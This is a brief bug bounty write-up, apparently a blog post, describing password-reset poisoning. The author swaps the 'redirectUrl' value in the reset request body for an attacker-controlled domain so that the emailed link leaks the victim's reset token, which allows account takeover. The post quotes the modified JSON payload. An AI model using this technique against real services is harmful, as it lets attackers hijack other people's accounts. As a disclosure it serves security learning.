Bishal Shrestha
Jan 11, 2024

--

The impact is similar to host header injection. In this particular case, the payload was passed in the request body. By default, the body request was set as {"redirectUrl": "https://hackerone.com/{token}"}. However, I modified it to {"redirectUrl": "https://attackcontroledsite.com/{}"}.

When the modified request is sent via email, it appears as "attackercontroledsite.com/thisisrandbutsecret_token" (to reset the password). Once the victim clicks on the link, the attacker obtains the reset token. By replacing the token with the appropriate host, i.e., "hackerone.com/resetoken," the attacker can take over the account.

--

--

Bishal Shrestha
Bishal Shrestha

Written by Bishal Shrestha

Learner || Appsec || Bug Bounty Hunter || Bugcrowd MVP Q2, 2021, Q3 2020 , P1 Warrior 2023

Responses (1)